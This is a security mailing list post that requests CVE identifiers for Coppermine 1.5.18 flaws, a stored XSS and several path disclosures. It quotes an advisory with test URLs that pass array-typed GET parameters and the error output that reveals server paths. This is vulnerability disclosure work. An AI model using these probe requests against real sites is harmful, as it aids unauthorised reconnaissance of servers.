Home page logo
/

oss-sec logo oss-sec mailing list archives

Re: CVE-request: Coppermine 1.5.18 waraxe-2012-SA#081
From: Henri Salo <henri () nerv fi>
Date: Tue, 3 Apr 2012 13:56:23 +0300

On Fri, Mar 30, 2012 at 11:36:23AM -0600, Kurt Seifried wrote:
What about the path disclosures?

I was not sure if those are really worth of CVE-identifier(s), but please do assign if you think those are needed. I do 
not see path disclosure issues as important security vulnerabilities especially if there is path disclosure issues in 
same version that there is other security vulnerabilities.

If you ask me two 2012 CVE-identifiers are needed. Please correct me in case I am wrong.

1. Stored XSS edit_one_pic.php keywords
2. Multiple path disclosures in 1.5.18
2.1. visiblehookpoints plugin index.php
2.2. thumbnails.php GET parameters "page" and "cat"
2.3. usermgr.php GET parameter "page"
2.4. search.inc.php GET parameters "newer_than" and "older_than"

These issues (according to the advisory page) are fixed in: 1.5.20 (I have not tested these). Here is the copypaste 
from original advisory:

"""
###############################################################################
2. Path Disclosure in "visiblehookpoints" plugin
###############################################################################

Test:

http://localhost/cpg1518/plugins/visiblehookpoints/index.php

Result:

Warning: require_once(include/init.inc.php) [function.require-once]:
failed to open stream: No such file or directory in
C:apache_wwwcpg1518pluginsvisiblehookpointsindex.php on line 22

Fatal error: require_once() [function.require]:
Failed opening required 'include/init.inc.php' (include_path='.;C:phppear') in
C:apache_wwwcpg1518pluginsvisiblehookpointsindex.php on line 22


###############################################################################
3. Path Disclosure in "thumbnails.php"
###############################################################################

Attack vector: user submitted GET parameters "page" and "cat"

Tests:

http://localhost/cpg1518/thumbnails.php?page[]
http://localhost/cpg1518/thumbnails.php?cat[]

Results:

Fatal error: Unsupported operand types in
C:apache_wwwcpg1518includefunctions.inc.php on line 2980

Fatal error: Unsupported operand types in
C:apache_wwwcpg1518 humbnails.php on line 160



###############################################################################
4. Path Disclosure in "usermgr.php"
###############################################################################

Attack vector: user submitted GET parameter "page"
Preconditions: admin privileges needed

Test:

http://localhost/cpg1518/usermgr.php?page[]

Result:

Fatal error: Unsupported operand types in
C:apache_wwwcpg1518usermgr.php on line 185


###############################################################################
5. Path Disclosure in "search.inc.php"
###############################################################################

Attack vector: user submitted GET parameters "newer_than" and "older_than"

Tests:

http://localhost/cpg1518/thumbnails.php?search=1&album=search&newer_than[]
http://localhost/cpg1518/thumbnails.php?search=1&album=search&older_than[]

Results:

Fatal error: Unsupported operand types in
C:apache_wwwcpg1518includesearch.inc.php on line 106

Fatal error: Unsupported operand types in
C:apache_wwwcpg1518includesearch.inc.php on line 107
"""


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]